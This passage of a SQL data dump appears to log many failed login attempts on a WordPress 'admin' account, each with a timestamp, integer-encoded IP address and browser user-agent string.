(101510, 1497832841.762774, 1, 'loginFailValidUsername', 'admin', 1, 2376729141, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)'),
(101509, 1497831278.966589, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101508, 1497828235.401656, 1, 'loginFailValidUsername', 'admin', 1, 1279333773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101507, 1497828234.219714, 1, 'loginFailValidUsername', 'admin', 1, 1279333773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101506, 1497827143.089936, 1, 'loginFailValidUsername', 'admin', 1, 2955645869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101505, 1497827141.810360, 1, 'loginFailValidUsername', 'admin', 1, 2955645869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101504, 1497826570.678797, 1, 'loginFailValidUsername', 'admin', 1, 1473158061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101503, 1497826569.686256, 1, 'loginFailValidUsername', 'admin', 1, 1473158061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101502, 1497825600.461401, 1, 'loginFailValidUsername', 'admin', 1, 1336721696, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MathPlayer 2.10b)'),
(101501, 1497825521.377228, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101500, 1497825049.165618, 1, 'loginFailValidUsername', 'admin', 1, 1700951514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101499, 1497821831.549607, 1, 'loginFailValidUsername', 'admin', 1, 1935748769, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101498, 1497821653.844921, 1, 'loginFailValidUsername', 'admin', 1, 703027240, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101497, 1497819896.657672, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101496, 1497816768.236374, 1, 'loginFailValidUsername', 'admin', 1, 1377999865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101495, 1497816767.294056, 1, 'loginFailValidUsername', 'admin', 1, 1377999865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101494, 1497815067.746044, 1, 'loginFailValidUsername', 'admin', 1, 1124568033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101493, 1497815065.085874, 1, 'loginFailValidUsername', 'admin', 1, 1124568033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101492, 1497814093.294681, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101491, 1497811698.857675, 1, 'loginFailValidUsername', 'admin', 1, 608746987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101490, 1497811697.110482, 1, 'loginFailValidUsername', 'admin', 1, 608746987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101489, 1497810104.167453, 1, 'loginFailValidUsername', 'admin', 1, 2872932610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101488, 1497810101.895573, 1, 'loginFailValidUsername', 'admin', 1, 2872932610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101487, 1497808525.462667, 1, 'loginFailValidUsername', 'admin', 1, 3250631515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101486, 1497808524.431158, 1, 'loginFailValidUsername', 'admin', 1, 3250631515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101485, 1497807962.532566, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101484, 1497806918.371756, 1, 'loginFailValidUsername', 'admin', 1, 1733213953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101483, 1497806916.925349, 1, 'loginFailValidUsername', 'admin', 1, 1733213953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101482, 1497804201.607960, 1, 'loginFailValidUsername', 'admin', 1, 1135341868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101481, 1497804200.403701, 1, 'loginFailValidUsername', 'admin', 1, 1135341868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101480, 1497802197.912357, 1, 'loginFailValidUsername', 'admin', 1, 3386038149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101479, 1497802196.376386, 1, 'loginFailValidUsername', 'admin', 1, 3386038149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101478, 1497801793.888975, 1, 'loginFailValidUsername', 'admin', 1, 1569717432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101477, 1497801792.863130, 1, 'loginFailValidUsername', 'admin', 1, 1569717432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101476, 1497801680.270565, 1, 'loginFailValidUsername', 'admin', 1, 2090188641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101475, 1497801677.969341, 1, 'loginFailValidUsername', 'admin', 1, 2090188641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101474, 1497801662.359944, 1, 'loginFailValidUsername', 'admin', 1, 702586352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101473, 1497801661.322948, 1, 'loginFailValidUsername', 'admin', 1, 702586352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101472, 1497800959.486297, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101471, 1497799446.777272, 1, 'loginFailValidUsername', 'admin', 1, 850344114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101470, 1497799444.641139, 1, 'loginFailValidUsername', 'admin', 1, 850344114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101469, 1497798449.392004, 1, 'loginFailValidUsername', 'admin', 1, 2945382205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101468, 1497798447.827548, 1, 'loginFailValidUsername', 'admin', 1, 2945382205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101467, 1497797538.840802, 1, 'loginFailValidUsername', 'admin', 1, 2997788116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101466, 1497797537.843903, 1, 'loginFailValidUsername', 'admin', 1, 2997788116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101465, 1497795808.051652, 1, 'loginFailValidUsername', 'admin', 1, 1293700813, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101464, 1497793166.706893, 1, 'loginFailValidUsername', 'admin', 1, 3680280345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101463, 1497793164.998783, 1, 'loginFailValidUsername', 'admin', 1, 3680280345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101462, 1497793040.593451, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101461, 1497792962.286029, 1, 'loginFailValidUsername', 'admin', 1, 657671819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101460, 1497792960.895536, 1, 'loginFailValidUsername', 'admin', 1, 657671819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101459, 1497792073.985796, 1, 'loginFailValidUsername', 'admin', 1, 2979849631, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101458, 1497789746.422211, 1, 'loginFailValidUsername', 'admin', 1, 3583324965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101457, 1497787602.223355, 1, 'loginFailValidUsername', 'admin', 1, 2523639257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101456, 1497787600.793425, 1, 'loginFailValidUsername', 'admin', 1, 2523639257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101455, 1497787453.359113, 1, 'loginFailValidUsername', 'admin', 1, 1920809324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101454, 1497787451.659746, 1, 'loginFailValidUsername', 'admin', 1, 1920809324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101453, 1497786852.621116, 1, 'loginFailValidUsername', 'admin', 1, 3109115678, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101452, 1497786851.496011, 1, 'loginFailValidUsername', 'admin', 1, 3109115678, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101451, 1497783196.664817, 1, 'loginFailValidUsername', 'admin', 1, 2982286323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101450, 1497783195.189090, 1, 'loginFailValidUsername', 'admin', 1, 2982286323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101449, 1497782492.080132, 1, 'loginFailValidUsername', 'admin', 1, 3698057776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101448, 1497782490.648076, 1, 'loginFailValidUsername', 'admin', 1, 3698057776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101447, 1497781902.746350, 1, 'loginFailValidUsername', 'admin', 1, 3318955358, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101446, 1497778549.765837, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101445, 1497777843.012826, 1, 'loginFailValidUsername', 'admin', 1, 1742943281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101444, 1497777841.364800, 1, 'loginFailValidUsername', 'admin', 1, 1742943281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101443, 1497777760.567832, 1, 'loginFailValidUsername', 'admin', 1, 762606085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101442, 1497777759.292479, 1, 'loginFailValidUsername', 'admin', 1, 762606085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101441, 1497777548.225908, 1, 'loginFailValidUsername', 'admin', 1, 247518067, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101440, 1497777546.628659, 1, 'loginFailValidUsername', 'admin', 1, 247518067, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101439, 1497775806.600342, 1, 'loginFailValidUsername', 'admin', 1, 1892043087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101438, 1497771536.671817, 1, 'loginFailValidUsername', 'admin', 1, 1979473355, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101437, 1497771534.914945, 1, 'loginFailValidUsername', 'admin', 1, 1979473355, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101436, 1497771327.784496, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101435, 1497770023.282022, 1, 'loginFailValidUsername', 'admin', 1, 1539529701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101434, 1497770022.272256, 1, 'loginFailValidUsername', 'admin', 1, 1539529701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101433, 1497768981.754121, 1, 'loginFailValidUsername', 'admin', 1, 1890377347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101432, 1497768980.296641, 1, 'loginFailValidUsername', 'admin', 1, 1890377347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101431, 1497768413.322731, 1, 'loginFailValidUsername', 'admin', 1, 704366584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101430, 1497763615.567274, 1, 'loginFailValidUsername', 'admin', 1, 1705472359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101429, 1497763551.992727, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101428, 1497762304.871171, 1, 'loginFailValidUsername', 'admin', 1, 697210739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101427, 1497762303.735535, 1, 'loginFailValidUsername', 'admin', 1, 697210739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101426, 1497762274.221311, 1, 'loginFailValidUsername', 'admin', 1, 1234445276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101425, 1497762273.092301, 1, 'loginFailValidUsername', 'admin', 1, 1234445276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101424, 1497760996.342732, 1, 'loginFailValidUsername', 'admin', 1, 1600620828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101423, 1497760995.163889, 1, 'loginFailValidUsername', 'admin', 1, 1600620828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101422, 1497759021.171303, 1, 'loginFailValidUsername', 'admin', 1, 29000538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101421, 1497759019.972660, 1, 'loginFailValidUsername', 'admin', 1, 29000538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101420, 1497756145.943120, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101419, 1497754528.191642, 1, 'loginFailValidUsername', 'admin', 1, 1298547324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101418, 1497754527.216211, 1, 'loginFailValidUsername', 'admin', 1, 1298547324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101417, 1497748772.388455, 1, 'loginFailValidUsername', 'admin', 1, 1591283272, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101416, 1497748771.291372, 1, 'loginFailValidUsername', 'admin', 1, 1591283272, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101415, 1497748547.102692, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101414, 1497745332.812805, 1, 'loginFailValidUsername', 'admin', 1, 693261352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101413, 1497745327.389403, 1, 'loginFailValidUsername', 'admin', 1, 693261352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101412, 1497745222.819074, 1, 'loginFailValidUsername', 'admin', 1, 1516638931, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101411, 1497744336.105335, 1, 'loginFailValidUsername', 'admin', 1, 3141232515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101410, 1497744334.293423, 1, 'loginFailValidUsername', 'admin', 1, 3141232515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101409, 1497742195.926239, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101408, 1497741033.572477, 1, 'loginFailValidUsername', 'admin', 1, 3142950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101407, 1497741032.128805, 1, 'loginFailValidUsername', 'admin', 1, 3142950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101406, 1497740759.012892, 1, 'loginFailValidUsername', 'admin', 1, 3125698943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101405, 1497740757.560320, 1, 'loginFailValidUsername', 'admin', 1, 3125698943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101404, 1497736250.944005, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101403, 1497730353.187887, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101402, 1497726285.668327, 1, 'loginFailValidUsername', 'admin', 1, 2588094137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101401, 1497726283.643142, 1, 'loginFailValidUsername', 'admin', 1, 2588094137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101400, 1497724220.740746, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101399, 1497723937.166895, 1, 'loginFailValidUsername', 'admin', 1, 2975005806, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101398, 1497722476.298526, 1, 'loginFailValidUsername', 'admin', 1, 2441280661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101397, 1497722475.256973, 1, 'loginFailValidUsername', 'admin', 1, 2441280661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101396, 1497721532.457588, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101395, 1497721531.481066, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101394, 1497718327.969654, 1, 'loginFailValidUsername', 'admin', 1, 995870782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101393, 1497717717.754712, 1, 'loginFailValidUsername', 'admin', 1, 1411143507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101392, 1497717716.805645, 1, 'loginFailValidUsername', 'admin', 1, 1411143507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101391, 1497716880.292059, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101390, 1497712987.073536, 1, 'loginFailValidUsername', 'admin', 1, 1816379950, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101389, 1497712985.907779, 1, 'loginFailValidUsername', 'admin', 1, 1816379950, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101388, 1497711024.386066, 1, 'loginFailValidUsername', 'admin', 1, 1330836365, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101387, 1497711023.427334, 1, 'loginFailValidUsername', 'admin', 1, 1330836365, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101386, 1497709036.464875, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101385, 1497708256.198436, 1, 'loginFailValidUsername', 'admin', 1, 995647581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101384, 1497708254.204235, 1, 'loginFailValidUsername', 'admin', 1, 995647581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101383, 1497707531.418068, 1, 'loginFailValidUsername', 'admin', 1, 3115319218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101382, 1497706885.929079, 1, 'loginFailValidUsername', 'admin', 1, 3320035317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101381, 1497706884.617598, 1, 'loginFailValidUsername', 'admin', 1, 3320035317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101380, 1497702817.740839, 1, 'loginFailValidUsername', 'admin', 1, 1521628389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101379, 1497701393.074002, 1, 'loginFailValidUsername', 'admin', 1, 248125723, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101378, 1497701390.804017, 1, 'loginFailValidUsername', 'admin', 1, 248125723, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101377, 1497700699.714808, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101376, 1497696912.804155, 1, 'loginFailValidUsername', 'admin', 1, 1733447443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101375, 1497696911.569883, 1, 'loginFailValidUsername', 'admin', 1, 1733447443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101374, 1497693020.368685, 1, 'loginFailValidUsername', 'admin', 1, 460953403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101373, 1497693018.971227, 1, 'loginFailValidUsername', 'admin', 1, 460953403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101372, 1497692937.853916, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101371, 1497692810.328503, 1, 'loginFailValidUsername', 'admin', 1, 1979195372, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101370, 1497692808.784430, 1, 'loginFailValidUsername', 'admin', 1, 1979195372, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101369, 1497692804.995367, 1, 'loginFailValidUsername', 'admin', 1, 1581440851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101368, 1497692803.309741, 1, 'loginFailValidUsername', 'admin', 1, 1581440851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101367, 1497689713.349287, 1, 'loginFailValidUsername', 'admin', 1, 2945257711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101366, 1497689711.810171, 1, 'loginFailValidUsername', 'admin', 1, 2945257711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101365, 1497688593.934547, 1, 'loginFailValidUsername', 'admin', 1, 418884769, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101364, 1497686646.350765, 1, 'loginFailValidUsername', 'admin', 1, 3291887407, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; Zune 3.0; MSN Optimized;US)'),
(101363, 1497685847.419204, 1, 'loginFailValidUsername', 'admin', 1, 657627066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101362, 1497685439.516710, 1, 'loginFailValidUsername', 'admin', 1, 1507333940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101361, 1497685438.523651, 1, 'loginFailValidUsername', 'admin', 1, 1507333940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
